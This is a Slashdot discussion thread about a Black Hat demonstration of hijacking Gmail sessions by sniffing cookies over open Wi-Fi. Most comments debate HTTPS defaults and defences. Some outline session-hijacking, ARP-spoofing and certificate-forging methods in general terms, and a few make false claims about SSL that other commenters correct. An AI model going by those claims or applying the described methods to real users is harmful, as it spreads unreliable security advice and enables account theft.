Point-and-Click Gmail Hacking Shown at Black Hat

not5150 writes "Using Gmail or most other webmail programs over an unsecured access point just got a bit more dangerous. At Black Hat Robert Graham, CEO of errata security, showed how to capture and clone session cookies very quickly over connections without encryption. He even hijacked a shocked attendee's Gmail account in the middle of his presentation. 'While Ou was typing, Graham was running Ferret and sniffing all the cookies that were being sent from Ou's laptop and Google. Graham then clicked on Ou's IP address and Gmail page, complete with Ou's recently sent message on the screen. We photographed both Graham's and Ou's laptop at that time and posted it to the picture gallery. You'll see that the contents are exactly the same.'"

Slow News day?

[OverlordQ]

Somebody intercepted plaintext on an open network . . . . did I miss something?

Re:Slow News day?

[andrewd18]

This is the first time it's been compiled into an automated tool. Note that this tool doesn't apply to just GMail, but any web service that uses a cookie, when the user is on an unencrypted wireless network.

Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.

Re:Slow News day?

[Cancel-Or-Allow]

The funny thing is, gmail offers the ability to sign-in securely, but not an option to keep it SSL throughout the entire session. It works when you manually change the http to https in the url after signed in, but there is still brief moment of unsecured traffic during this process.

Re:Slow News day?

if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in.

You have no idea how SSL works.

Re:Slow News day?

[The+Velour+Fog]

Also, logging in via SSL doesn't always work either - if the traffic is sniffed as the browser is sending the SSL requests, one could sniff the SSL key and just use that to get in. SSL uses Diffie-Hellman key exchange so no unencrypted key is ever sent

Re:Slow News day?

[zippthorne]

That's odd. I go to https://mail.google.com/ and at no time during the login process do I ever see the address bar go from yellow to white. Are you sure it still works the way you say? Or is it sending something unencrypted so fast that I'm just not noticing (which would be kind of worrying).

Re:Slow News day?

[Kartoffel]

That's easy enough to fix with a Firefox plugin: http://www.customizegoogle.com/

Re:Slow News day?

You cannot sniff an SSL request to intercept a key.

Re:Slow News day?

[HitekHobo]

I'd be a lot more impressed if they had altered Doug Song's toolsuite from 7 years ago to use wifi at layer 2.

Dsniff / Monkey in the middle attacks

Re:Slow News day?

[tom17]

Seemingly neither do the people in the comments section at the bottom of TFA :-(

Worrying.

Re:Slow News day?

[pairo]

Or not? I can't get it to work over http for me, it just redirects me to the https version.

Re:Slow News day?

[Brian+Gordon]

Even if they did somehow get your session cookie, you're logged in via a secure connection (:443) and I'm sure it would be noticed by google if they tried to use your session cookie to log in without your SSL credentials- which of course there's no way to get.

Re:Slow News day?

[kdemetter]

it is possible however . it basically works be faking the certificate .
Cain does it that way . The user does get a notification that the certificate is untrusted , but most people will just allow it anyway ( otherwise they can't use the webpage ) .

Re:Slow News day?

[Aeiri]

This is the first time it's been compiled into an automated tool. No it's not, there's another that's better and it's been around for a long while. It was once Ethereal, and now called Wireshark.

Re:Slow News day?

[gkhan1]

As some other posters said, this is absolutely not true and it hasn't been true since asymmetric cryptography and secure key exchanges where discovered.

However, if the hacker was able to set himself up as a proxy between the computer and the network (by using ARP spoofing, for instance), he could substitute his own certificate for Google's, decrypt the traffic, read it, and then forward it to Gmail (that is, a man-in-the-middle attack). This takes way more work, and there will be a popup that says "This certificate has not been signed by a trusted authority, someone might be trying to sniff you out". No one with a tiny bit of computer security knowledge would fall for this, but a clueless user who clicks "Allow" on everything probably would be. Still, WAY more work.

Re:Slow News day?

it is possible however . it basically works be faking the certificate .
Cain does it that way . The user does get a notification that the certificate is untrusted , but most people will just allow it anyway ( otherwise they can't use the webpage ) . It's possible to intercept the connection during the handshake, yes. But it is nontrivial to intercept a connection after a genuine handshake has occurred. Simply sniffing the handshake process as the gp suggested will not get you any closer to having any connection credentials.

Re:Slow News day?

[tizan]

I believe if you use https://gmail.google.com/ (note gmail instead of mail) your whole mail session is always encripted and not the login page only.

Re:Slow News day?

one could sniff the SSL key and just use that to get in

HEH, you might want to check out Public Key Encryption. A novel concept I'm sure.

Re:Slow News day?

[ubernode]

Yes, you missed the fact that after signing in via the SSL enabled login page, you're back into a non-secured area. GMail does allow you to manually add an 's' in the address bar but by that time you've already sent at least some unencrypted data. After searching thru GMail's help, it seems as if they allow mail to be fetched via an SSL connection https://mail.google.com/support/bin/answer.py?answ er=21291&query=ssl&topic=&type=f&ctx=search but there is no option to enable it for the regular web interface... what am i missing?

Re:Slow News day?

Anyone else's https gmail connection gets owned when they visit http://www.gmail.com (the unencrypted page)?

Re:Slow News day?

[Daytona955i]

If you just type in mail.google.com and rely on your browser to prepend the http:/// for you, it will direct you to the secure page for login and then back to the non-secure page for email. If however, you initially type in https://mail.google.com/, login, you will stay on https.

Re:Slow News day?

[catxk]

Why isn't this default?

Re:Slow News day?

[Sancho]

You can actually sniff the traffic to see that your browser is making requests to Gmail over port 80. It's that magical Web 2.0 crap--you can't really tell what your browser is doing by the visual cues that have worked so well in the past.

Re:Slow News day?

[Jaysyn]

I thought it was the default. Even when I type www.gmail.com (by itself) in the address bar it always defaults to HTTPS.

Re:Slow News day?

[gpuk]

That is the correct behaviour.

Essentially, if you enter via http://mail.google.com/ Google remembers this and encrypts only the login process and then reverts back to plain text. If you enter via https://mail.google.com/ your session remains encrypted throughout.

Re:Slow News day?

But after you've logged in, it goes back to http:/// again. Unless you use https://gmail.google.com/ in which case, the session remains https://./ As far as I can tell.

Re:Slow News day?

[A+non-mouse+Coward]

I'm not so sure that I'd trust the Customize Google plugin to solve this problem. After all, it redirects http://whatever.google.com/ URLs to https://whatever.google.com/ URLs often after the http connection occurred, which in my mind, is ample time to send the auth cookies in the clear via http, then reload the page and do it a second time in https. I'm sure a very simple sniff would tell this for sure (but I'm trying to post this quicker than you, so sniff for yourself ;).

The real solution is to NEVER do https. Or, in Google's case, they could just require https, having the http version of their site not auth users at all until the session has been redirected to https.

Re:Slow News day?

[Cajal]

that depends on what SSL ciphersuite your browser negotiated. Some SSL ciphersuite support DHE keying. For others, the client generates a random key, encrypts it with the server's public key, and sends it to the server.

Re:Slow News day?

[space_in_your_face]

Because this means more computing for google servers. And also because your mail is sent as plain text to the recipient's mail server (and it came as plain text on google server). So it would be useless to crypt only the first (or last) part of the way. So, as long as the authentification method is not broken (today it is), there's no point in using ssl for the whole session. Maybe google will change the default now.

Re:Slow News day?

[zippthorne]

It IS a silly default, though. All you have to do is forget to type it manually just once and bam, plaintext. Anyone can read the subjects of emails sent to you at the very least.

I mean, yeah, some people might not care about security, but that's no reason to make the default inherently insecure. At the very least, they could have the first view not actually show the contents of the inbox, so when you log in insecurely by mistake, you can switch to secure without actually compromising anything.

But it IS still in Beta, so it is expected to be a little rough around the edges. I hope they do something about that before going live, though.

Re:Slow News day?

[Jaysyn]

Ah, I see what you mean. Also, I use the GMail Notifier for Firefox which you can default to the secure connection.

Re:Slow News day?

[X0563511]

It works for https://mail.google.com/mail

Note the /mail at the end.

But your gmail.google.com is easier :D

Re:Slow News day?

[gnarfel]

Gmail has gone live, they're allowing anyone to sign up now. It's not a private beta anymore.

Re:Slow News day?

[RubberDogBone]

Well, I dunno about you but I use one main PC at home, one Mac laptop, and one PC at work, and I have setup all three with a toolbar bookmark that goes to the secure Gmail session. https://mail.google.com/

That makes it easy to connect the right way. It doesn't take long to type by hand either.

Re:Slow News day?

[FutureDomain]

That's why I have the CustomizeGoogle Firefox extension. It has an option to always use a secure connection to GMail, Google Calendar, Google Docs, Google Reader, and Search History. Now I never have to remember to use https:/// it just uses it automatically.

Re:Slow News day?

[Burz]

This takes way more work, and there will be a popup that says "This certificate has not been signed by a trusted authority, someone might be trying to sniff you out". No one with a tiny bit of computer security knowledge would fall for this, but a clueless user who clicks "Allow" on everything probably would be.

And I try to educate everyone I know about handling certificate warnings. They are all worried about Internet insecurity, and I tell them their connection (assuming they have a clean systems) WILL be very secure if the browser displays the lock symbol and they have not chosen to bypass a certificate warning.

This, along with making people more aware of address domains in pages and emails, is what everyone frequenting these techie/nerd sites should be explaining to everyone around them. Tell them that whatever confidence they got from "doing things" on the Internet by clicking on pretty pictures is probably false and they may need to learn crucial (if simple) rules before they get in trouble.

The Internet now is like the common roadway in the 1920s: No one has taken drivers' ed, and even basic computer literacy courses don't teach about SSL!

Trojans are another huge problem, and should scarcely exist. However our modern GUI interfaces have been designed to pictographically confuse data with code, as documents and the programs that use them usually have the same/similar icons. BeOS was an exception where all code was shown with a '!' prefix. I think Ubuntu has been trying out a similar scheme. No script or binary should EVER be allowed to look like a jpeg or other data file.

Re:Slow News day?

[devilspgd]

No, it likely would not be noticed -- Large scale websites will normally use a SSL proxy that sits in front of the web servers, the backend likely knows nothing at all about SSL, except whether or not SSL was used.

Re:Slow News day?

[devilspgd]

That isn't a completely automated tool -- It will capture the data fairly trivially, but this is new, now we have a tool that will pre-populate the browser's cookies.

In other words, capturing isn't new, cloning trivially is...

Re:Slow News day?

[SanityInAnarchy]

Because this means more computing for google servers.

This is Google we're talking about. They can take it.

I mean, seriously, even an old 200 mhz Linux box set up as a server can do crypto at wire speed (100 mbit ethernet). I'm sure it takes them more cycles to spellcheck it for you.

And also because your mail is sent as plain text to the recipient's mail server (and it came as plain text on google server). So it would be useless to crypt only the first (or last) part of the way.

"Not entirely secure" is not the same thing as "useless".

Consider: The majority of most websites are mostly served as plain HTML over HTTP. Is it still "useless" for me to admin mine using SSH instead of unsecured FTP? I think not.

The point I am making here is, if your communications with Gmail are unencrypted, it makes it possible for someone to not only intercept the content of the message, but alter it -- they could, in fact, hijack your whole session, gain access to your archived mail, and send mail pretending to be you. All of this is theoretically possible with that SMTP connection between Gmail and another mailserver, but it's also insanely difficult to get anywhere close to what you can get by hijacking the session.

And there's even a point to encrypting it, as opposed to just signing it. Well, two points, actually:

1. Browsers include SSL natively, but there's no spec for just signing something and sending it plaintext. Therefore, it would have to be done in JavaScript, which is MUCH slower.
2. SMTP is only used for connections between Gmail and other servers. Mail sent between you and another Gmail address is entirely secure, once it gets to the server. Why let people hijack your session and make it insecure?

I mean, I tend to agree with you somewhat -- I only really do email from the one machine that has my GPG key, and I wouldn't use Gmail for more than backup. I don't see much point to webmail, because I never login to anything from a computer that isn't my own, because I don't like exposing myself to keyloggers.

But even if it can't be very secure, why make it even less secure than it can be?

Re:Slow News day?

[zippthorne]

Well yeah, now I do. After a couple page loads where I noticed, "Hey, That's not secure. Oops." I put in a quick bookmark to accommodate my usual method of accessing google mail: typing alt-d gmail

Re:Slow News day?

[Cancel-Or-Allow]

That's odd. I go to https://mail.google.com/ and at no time during the login process do I ever see the address bar go from yellow to white. Are you sure it still works the way you say? Or is it sending something unencrypted so fast that I'm just not noticing (which would be kind of worrying). When I goto www.gmail.com the sign in screen is secure. It actually gets redirected to https://www.google.com/accounts/ServiceLogin
After signing in, it reverts back to http://mail.google.com/mail at which point I add the 's' to the http to go secure mode.
If I leave my browser window open, sign out, and sign back in, it remains secure. But after closing and reopening the browser the same as I mentioned above happens.

Re:Slow News day?

[SanityInAnarchy]

All you have to do is forget to type it manually just once and bam, plaintext.

Or you could bookmark it, but yeah, I agree.

At the very least, they could have the first view not actually show the contents of the inbox, so when you log in insecurely by mistake, you can switch to secure without actually compromising anything.

Nobody sniffed an email being written. What they did was sniff the session cookie, and then proceed to hijack his session. This means that if you login insecurely by mistake, and someone grabs that cookie, it doesn't matter if you switch to secure, because they can still use that cookie to pretend to be you.

Think of it like this: It's not like looking over someone's shoulder while they're using Gmail. It's like grabbing their username and password with a keylogger, and then checking out their account in your own sweet time.

However, if you're quick, you can probably logoff and back on before they get anything. Also, it's not as bad as if they actually had your password, because if they had that, they could actually change your password.

Re:Slow News day?

[zippthorne]

I intended to make clear that I was manually typing (well actually using a bookmark I manually typed) the full address, starting with "https://"

I was aware of the "secure sign-in, pop back to unsecure if you didn't specify" feature.

Re:Slow News day?

[neoscsi]

I mean, seriously, even an old 200 mhz Linux box set up as a server can do crypto at wire speed (100 mbit ethernet). How many simultaneous gmail sessions do you think it would take to reach 'wire speed'? I'm rather sure that if they were all SSL your 200mhz Linux server would have smoke pouring out of it before it reached 10mb.

Re:Slow News day?

"I mean, seriously, even an old 200 mhz Linux box set up as a server can do crypto at wire speed (100 mbit ethernet). I'm sure it takes them more cycles to spellcheck it for you."

SSL session establishment is a lot more expensive than the block crypto you're thinking of. I don't remember the exact numbers, but it's a couple orders of magnitude more expensive I think, and it doesn't take too many sessions to overwhelm a server. You can use openssl's performance tests to see for yourself.

I'm not saying they shouldn't do it by default, just pointing out that it's not that trivial.

Re:Slow News day?

[Cajal]

Browsers include SSL natively, but there's no spec for just signing something and sending it plaintext. There are SSL ciphersuites that don't encrypt data, but do send an mic or hmac. For example, TLS_RSA_WITH_NULL_MD5 and TLS_RSA_WITH_NULL_SHA.

Re:Slow News day?

Maybe gmail is keeping all trafic through SSL if you're logging in
through the https from the beginning, but what about the others ?

Many sites will use https for the main page, etc but will link the
pictures, logos through plain http from the same domain.
When getting them, the browser will send the cookies in plain so
everybody could see them.
(And many sites don't even bother to make the cookie into a hash
  or something - it's just user=, pass=, age=, fullname=, :-)

Re:Slow News day?

[SanityInAnarchy]

Irrelevant. My 200 mhz Linux server would have smoke pouring out of it from the spellchecking alone. It wouldn't even be able to think about the contextual ads.

Again, I don't think SSL is a huge performance issue compared to everything else they're doing, especially when you can so easily throw hardware at the problem -- it actually doesn't cost that much to buy a device which is dedicated to crypto. I know there's at least one network card which does ipsec at the hardware level.

Re:Slow News day?

Using https over http is great except that hardly a fraction of email users know all this.

And what about the entire network that every data byte of yours traverses - multiple gateways, ISP caches, etc.

botnets, sniffers, how do you guarantee that your email is not openly available to a determined cracker?

Encryption is very much there, but hardly any web mail providers give that for free or even offer that.

Is pre-encrypting your text in your text editor a good idea?

All ears.... please recommend....

Re:Slow News day?

[brunes69]

Depends on the context.

I ignore "untrusted cert" warnings all the time at my work, since we don't have any valid ones. Also, if it is my first visit to a site, I generally ignore them. But from GMail? On an open WiFi network? I don't think so.

Scary

But really, copying cookies? Is this really that unprecedented?

psh

[jimbug]

everyone knows my mom's cookies taste better than gmail's. they can't be intercepted over an open wirless network either.

Re:psh

[Applekid]

Maybe not, but the heavenly smell is basically a SSID broadcast of their existance to those interested in finding them.

Re:psh

your mom tastes great too.

Re:psh

Go home, Dad, you're pissed.

Re:psh

This comment made me explode in my pants.

Re:psh

[228e2]

lol @ this being informative.

Re:psh

[dorianh49]

Does that mean that we can report anyone who sniffs the wireless network to the police?

Could be fixed easily by Google. Shame.

[OpenGLFan]

This is shameful. It's 2007, Google. SSL has been a (reasonable) standard since 1996. USE IT.

Good reason to install Better GMail!

[Mr.+X]

The Firefox extension forces GMail to always run over SSL. It's great!

Re:Good reason to install Better GMail!

[afidel]

I think you should have linked to the Mozilla addons page. I know I wouldn't install a firefox addon from a random site with the name hacker in the URL.

Re:Good reason to install Better GMail!

As one of those six-digit kids, you may not be familiar with the difference between hacker and cracker.

Re:Good reason to install Better GMail!

[toad3k]

Yeah, but no one here has a life so they aren't in any danger. /ducks

Re:Good reason to install Better GMail!

only issue is, that retarded script kiddie sites don't know the difference either.

Re:Good reason to install Better GMail!

[necro2607]

Funny, that same mentality of reacting to something based on face appearance is why governments uses phrases like "Patriot Act" and "Homeland Security" and other friendly sounding things to give a visage of righteousness to things that aren't neccesarily so decent and proper as they make themselves out to be... Just thinking out loud there...

Re:Good reason to install Better GMail!

[Frosty+Piss]

Oh Jesus, give me a break. If both are hacking my network, both are the same. And what's with basement dwelling virgin geeks calling themselves "security Researchers" and "CEO" of their little hacker / masturbation buddy group?

Re:Good reason to install Better GMail!

[TheoMurpse]

To be fair, the term Life Hacker in the URL means, from my experience, "One who does things to make their life better." Typically, the site has information about improving your productivity, how to make yourself more efficient, and how to cope with life problems. Thus, you are a life hacker.

But your concern about "hacker" being in the title is understandable.

Re:I give 10 minutes

[Constantine+XVI]

Apple has nothing at all to do with it.

yum

geez. cookie theft over a non-secured network!!! how did this even make it on slashdot?

Thunderbird?

[j.sanchez1]

I use Thunderbird for Windows XP to manage all my different email accounts. Would something like this be a danger, or does Thunderbird encrypt traffic?

Re:Thunderbird?

[pedramnavid]

thunderbird uses pop3. gmail's pop3 servers use ssl. so you should be okay.

Re:Thunderbird?

Email encryption is server-specific whether in a browser or a dedicated client.

Re:Thunderbird?

[jrumney]

Under server settings for your mail account, make sure either TLS or SSL is selected if you want to ensure that your connection is encrypted. I think TLS, if available is the default. On servers that support STARTTLS, this is OK, but it won't warn you if your server does not support it. Its better to try the forced TLS, and if you get an error, try SSL. If you have to switch back because your server does not support either, at least you know its insecure and can change your behaviour on insecure networks to compensate. It's also worth firing a request to the administrator if you find your server does not support TLS or SSL.

Re:Thunderbird?

This applies to session cookies from accessing a webmail interface online. If your e-mail accounts are POP/SMTP through Thunderbird then this doesn't affect you. The WebMail plugin for Thunderbird might be affected (can it be configured to use an SSL connection? does it log-out of your mailbox and close the session when it's done?) but it generally operates so quickly that you would have very minimal exposure.

Re:Thunderbird?

[j.sanchez1]

Under server settings for your mail account, make sure either TLS or SSL is selected if you want to ensure that your connection is encrypted

Thanks! I'll check those settings. I don't use open networks very often, but when I have to, a little bit more protection is always wanted.

Re:Thunderbird?

[jrumney]

If you can eavesdrop on session cookies, you can eavesdrop on any other plain text connection. Whoever modded the GP as Offtopic needs his head examined, as the vulnerability of other applications to the same attack is very relevant.

Re:Thunderbird?

[Sancho]

More importantly, POP3 doesn't make use of cookies which can be intercepted. Although encrypting your entire web Gmail session would solve the problem, the attack works primarily because it's webmail.

Re:Thunderbird?

[cecille]

Why is this marked as OT? Given the number of posts here telling people to educate their friends on internet security, a post asking for clarification of whether a certain practice is going to cause problems seems like a perfectly valid question.

Correct me if I'm wrong but

[trifish]

Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a differnt IP address so the cookie is rejected as invalid. The only situation where this solution may get a bit annoying is if you're behind a load-balancing proxy, which changes your IP address on every request (fortunately, this is somewhat rare.) It's better than allow easy hijacks...

Re:Correct me if I'm wrong but

[Stile+65]

If the hijacker gets on your wireless AP, then he's NATed behind the same public IP address as you. Voila, he matches your IP. Another layer is to also fix the session cookie to the browser's UA string, but that won't work if the attacker knows you're doing it and changes his browser's UA string to match yours. In summary, secure your wireless AP if you're a user and buy some SSL acceleration hardware so you can support forcing all traffic on your website to use SSL if you're a service provider.

Re:Correct me if I'm wrong but

[Bob+535604]

I suppose they could be, but aren't in my experience. I never have to log into my gmail account, and my ip address changes often as I take my laptop to work and back. Of course, I use https, but the cookie doesn't seem to care about my ip address.

Re:Correct me if I'm wrong but

[trifish]

I've just read TFA and realised that all people in the room were sharing the same IP address, so what I described in parent post wouldn't help. The only thing they can do is force SSL to all requests.

Re:Correct me if I'm wrong but

[IBBoard]

Somewhat rare amongst Slashdot users, perhaps, but not amongst AOL dialup. I have a reasonable number of people hitting my website from the same address and different addresses at the same time (i.e. it's obvious from browsing patterns that there's different people using the same central AOL load balancing IP, but the next requests will come in from different ones).

Unfortunately AOL isn't as dead as many of us would like.

Re:Correct me if I'm wrong but

[vidarlo]

Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a differnt IP address so the cookie is rejected as invalid.

More often than not, all users of a wireless net is behind a NAT device, which makes all the devices have the same official IP. The same applies to most domestic, workplace and school wlans, so really, that would make little or no difference. Now, in a IPv6 world, it would make a difference, since everyone has a unique IP there...

Re:Correct me if I'm wrong but

[TheRaven64]

Even if he's not NAT'd, if he's on the same WLAN then he's on the same broadcast segment as the real owner of the IP, so he can just send packets claiming to be from the legitimate user and run his interface in promiscuous mode to grab the replies.

Re:Correct me if I'm wrong but

[suv4x4]

Even if you don't have encrypted transfer, session cookies can be easily secured by associating them with a certain IP address. The attacker who captures the cookies has a differnt IP address so the cookie is rejected as invalid.

AOL dial-up which is relatively popular in USA (yea..) does this. Every request is on a different IP. Which is why many people don't do this.

It gets complex: you can not apply this fix to IP-ranges on AOL you know are used for dial-up. I also check the exact user agent string, of course this is fakeable, but better than nothing.

Re:Correct me if I'm wrong but

Of course, I use https

A lot of gmail's traffic happens "under the covers" using XmlHttpRequest. Has anyone actually checked that this uses https? If not, the security you think you're getting may be illusory.

Re:Correct me if I'm wrong but

[DeadboltX]

When you are sniffing wireless traffic you aren't actually associated with any access point. You simply open up your wireless card to receive all the 802.11 traffic floating around it.

Using WEP is just as bad as not using any security on your AP. If someone is savvy enough to sniff wireless traffic then they are savvy enough to crack your 128 bit WEP key in 10 minutes.

Re:Correct me if I'm wrong but

I always run my "interface" in promiscuous mode. It's too no-one else does :(

Re:Correct me if I'm wrong but

[denmon]

It's common enough to be a problem... at my company (subscription-based web app for sales people) we implemented an IP cookie, and several of our customers would get randomly kicked out of their sessions after 15-30 minutes. We eventually tracked it down to their corporate firewalls shifting the public IP they use. I think these were mostly active/active firewall clusters where each node in the cluster had a different public IP. It could also happen at a customer site that has dual WAN connections. So it's not just AOL users.

We eventually had to update our software to have explicit exemptions to the IP cookie checking, on a per user basis, since our site was unusable to those customers when the IP cookie checking was active.

Re:Correct me if I'm wrong but

[Drenaran]

AOL isn't exactly rare, and employs the load-balancing you mentioned. While not used much by people who utilize the internet in a non-minimalistic fashion, many older users who are only concerned with the occasional e-mail and getting pictures of their grandkids still utilize it. It is also used by some privacy conscious users specifically because of the constantly changing IP (this specific circumstance came up in a PHP course when going over handling logins).

A service such as Gmail serves too broad a range of users for users this sort of "identity confirmation" to be implemented reasonably for every user.

Re:Correct me if I'm wrong but

[Drenaran]

AOL isn't exactly rare, and employs the load-balancing you mentioned. While not used much by people who utilize the internet in a non-minimalistic fashion, many older users who are only concerned with the occasional e-mail and getting pictures of their grandkids still utilize it. It is also used by some privacy conscious users specifically because of the constantly changing IP (this specific circumstance came up in a PHP course when going over handling logins). A service such as Gmail serves too broad a range of users for users this sort of "identity confirmation" to be implemented reasonably for every user.

This isn't new!

[drspliff]

Ok, so he was sniffing TCP/IP packets for HTTP cookies in unencrypted traffic passing over the same wireless network as him, maybe some nifty tools there but the idea is not new at all.

Re:I give 10 minutes

[siliconbasedlifeform]

What the hell does Apple have to do with GMail?

Firefox

[Sierpinski]

I don't have the extension that forces it to use SSL, but all you have to do to force the connection manually is add the 's' after http, and the session will reload under SSL. Hopefully you haven't already been compromised at that point.

I'm going to look for the Firefox extension now...

Re:Firefox

greasemonkey: http://userscripts.org/scripts/show/2588

Re:I give 10 minutes

[Amiga+Lover]

Apple has nothing at all to do with it.

Wow, you guys are getting quick. One minute for a denialist to chime in. I'm impressed.

Re:Could be fixed easily by Google. Shame.

Gmail already supports ssl. Just use https instead of http in the url.

POP/SMTP + SSL

[gotw]

Oh well. At least with gmail you get the option to use POP/SMTP, which in their case is SSL secured.

Of course, you still have to use web access to enable it.

Duhh

[oxygen_deprived]

Duh...
The guy is intercepting traffic and stole a cookie. Big deal.
Additional info : If you need the id as well, try base64 decoding of all the fields in the cookie ( dont remember whether it was orkut or gmail that sends out id base64 encoded )
And why exactly is this front page news? The attack is lame, and the technique is script kiddie stuff, and has been around since ages.

Re:Could be fixed easily by Google. Shame.

[ohearn]

Gmail will use SSL over any browser, it just doesn't by default (which is a shame, but easily fixed for those of us that care)

O RLY?

[Control+Group]

I'm sure everyone's going to bitch about how Google should use SSL for everything. And from a marketing perspective, maybe they should.

But the openness of your wireless network really isn't their problem. You don't blame the banks if you shout your PIN out while you're at the ATM, do you? Or, more aptly, you don't blame the bank if you trust your ATM card and PIN to some stranger in a coffee shop.

It isn't Google's responsibility to secure your connection end-to-end. It's far more reasonable to think that it's your responsibility to not broadcast sensitive information in plaintext!!

Re: O RLY?

[xaxa]

It's not "my wireless network", it's the one at the airport/cafe/station/city street/university/office etc.

The ATM at the bank puts '*' for each character of my PIN as I type it in, with your analogy Google aren't doing this.

Re: O RLY?

[fmobus]

You ignore that average users have no idea of the difference between http and https. Any webmail worth their salt should default to SSL, period.

Re: O RLY?

Should any *free* webmail incur the huge cost increase by default?

Consider, it's free. The storage space is considerable. Ads are not imbedded in the mail itself. Ads in the UI are unobtrusive and can even be eliminated. And SSL is there for people who know how to use it. And can be made the default by the same people.

For free.

Seems to me like you're already getting *way* more than you pay for ;)

Re: O RLY?

[Jessta]

But you do blame the bank if the ATM you are entering your PIN at is insecure.

Having an open wireless network in the least of your troubles, I chance of someone in your area stiffing your packets in very small. The chance of someone stiffing your packets across the public internet is much higher.

I have an open wireless network, but all communication of a sensitive matter is transfered over HTTP or SSH, I really don't care if random people stiff my packets and read my slashdot.

Re: O RLY?

[SanityInAnarchy]

I don't care either. Security is such a bother...

Then you won't mind me hijacking your message, do you, SanityInAnarchy? I can make you say whatever I want! Muahahahaha!

Re: O RLY?

[SanityInAnarchy]

I'm sure everyone's going to bitch about how Google should use SSL for everything. And from a marketing perspective, maybe they should.

Or maybe they should use SSL for things which really should be secure, like Gmail. Maybe from more than just a marketing perspective.

But the openness of your wireless network really isn't their problem.

It's not necessarily my wireless network -- notice that the example from TFA was someone checking Gmail from a conference. Obviously, George Ou didn't have the opportunity to secure that wireless network for himself.

It isn't Google's responsibility to secure your connection end-to-end. It's far more reasonable to think that it's your responsibility to not broadcast sensitive information in plaintext!!

True enough. But in this case, it means either you have to turn on the SSL for yourself (use the https URL), or you have to not use Gmail.

Think about it: What is really different about broadcasting sensitive information in plaintext over wireless, and broadcasting sensitive information in plaintext over the Internet? Do you really trust your ISP that much? How about every router between you and Google? At least 15 hops, by my count, between me and mail.google.com. Do I trust netINS to not read my email, and to be secure? Do I trust ALTER.NET to not read my email, and to be secure? How about Qwest?

Need I go on?

Open wireless networks are just the easiest place to sniff plaintext, but plaintext is plaintext anywhere, so I say hell yes, Google should be using SSL by default for Gmail.

Re:Could be fixed easily by Google. Shame.

[SatanicPuppy]

They offer it. All you have to do is go to https://mail.google.com/ rather than http://mail.google.com./

I fail to see how the average person, as usual, being lax about their security is in any way Google's fault. This was something I found immediately, just because I won't check my email without a secure connection.

Re:thank god...

[jimbug]

Do they not use cookies? If they do, then unless I'm misunderstanding something, you won't be any more safe then if you are using GMail.

Re:I give 10 minutes

[Constantine+XVI]

You do realize that GMail and Apple aren't related at all, right? The FA didn't even mention Apple. ...but I'm guessing you didn't read it. This is Slashdot, after all.

Bottom line

[Kadin2048]

I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

It's more of an indictment of Google than anything, because they default to unencrypted HTTP rather than HTTPS, and most users won't know that they can go to https://mail.google.com/mail/ to force smarter behavior.

Re:Bottom line

[It'sYerMam]

And furthermore, if you use google via a customised google page (http://www.google.com/ig) then even if you redirect that to https://.../ then the link to GMail is still regular http.

Re:Bottom line

[RegTooLate]

I think the CPU costs of redirecting everyone to 128-bit encryption is one reason to leave it defaulting to http. Besides, it is the user's fault for not typing in the address securely.

Re:Bottom line

[X.25]

I think the upshot of this isn't really "look at us, we can sniff plaintext Wifi connections," but "look at one of the biggest players in web mail use plaintext connections even though they ought to know it's a hideously bad idea."

Thank God I got out of shitty security 'world' in time. If *this* gets into Black Hat these days, then either security world is very slow these days, or quality of security 'researchers' really went downhill badly.

Just because it's GMail, it doesn't make it any more or less stupid. Technique is as old as networks, there is nothing new there. Except "Oh look, it's Google!!!" factor, which has nothing to do with security.

If I'd even think of submitting something like this in "old" Black Hat days, I'd be laughed at for the rest of my life, by my colleagues.

Times have changed, I guess...

Re:Bottom line

[shellbeach]

And furthermore, if you use google via a customised google page (http://www.google.com/ig) then even if you redirect that to https://.../ then the link to GMail is still regular http. If you're using a customised google page (and thus allowing google to store your search history, etc, etc) chances are you don't care too much about privacy anyway ...

Re:Bottom line

[It'sYerMam]

I think just because someone doesn't mind sharing their data with google doesn't mean they don't mind sharing it with any Tom, Dick or Harry who happens to come along with a bit of tech.

Re:Bottom line

[Mana+Mana]

The question I have been asking for months is why does Google not use httpS if I so desire on all their properties?

I can't believe that CPU cycles is the reason. You big farm guys tell me, is it so?

And has been noted elsewhere: only gmail, gcalendar and gdocs accept httpS. A plain google search does not honor it. Nor Gmaps! Sheer stupidity: yeah, I want anyone who wishes to know my most precious loved ones addresses, and where I am most likely to be in the next thirty minutes.

Not to mention, whilst I am encrypted to gmail, if I happen to perform a web or news search, say, my cookies leak out into http (as can be seen in the upper right the web page, viz your gmail address).

I tell you, I use Google Desktop for the searching convenience: [jfk to 10038^p] [dragon boat races^n] etc. But this leakage had crossed my mind before and it sours me on my good will toward them. Foolish stuff.

Re:thank god...

[techiemikey]

yea...your just as screwed from the sound of it.

Re:I give 10 minutes

[Control+Group]

I can't tell if this is the troll version of the long con, or if you've really got some sort of point about Apple, here.

If the former, I have to say, it's a well-played troll. If the latter, it would be nice if you got off your ass and made whatever devastating point you're so coyly alluding to.

rofl

[SatanicPuppy]

Ha! Come on, give it up for the troll, that was funny.

Ouch!

Someone hasn't understood asymmetric encryptions schemes!

A BLack hat attendee hacked?

[dk90406]

Please. Those guys are supposed to be security wizards! And now one of them is caught using plain HTTP to access gmail? I hope they laughed hard at him. Even securety noobs like me know when to use HTTP and HTTPS.

Luckily gmail keeps the entire session in https opposed to other sides that also are hackable the same way, where only the logon is secure. After that they switch to http and are susceptible (e.g. facebook) to this attack.

There is more on this on Ars Technica: http://arstechnica.com/news.ars/post/20070801-repo rt-sidejacking-session-information-over-wifi-easy- as-pie.html

Re:A BLack hat attendee hacked?

[Bob+535604]

Hah, no kidding. If I were at a black hat conference, I know I would be tunneling ALL my traffic somewhere safe first, in addition to using HTTPS.
Also, gmail only uses https if you tell it to. Last time I checked, it uses http by default.
And lastly, I don't think facebook has any info on there that I wouldn't want made public anyways, so it's probably not necessary for them.

Re:A BLack hat attendee hacked?

[timoguin]

Why would anyone at a hackers convention do anything online without using an SSH Tunnel in the first place? These people should know better.

Re:A BLack hat attendee hacked?

[serviett]

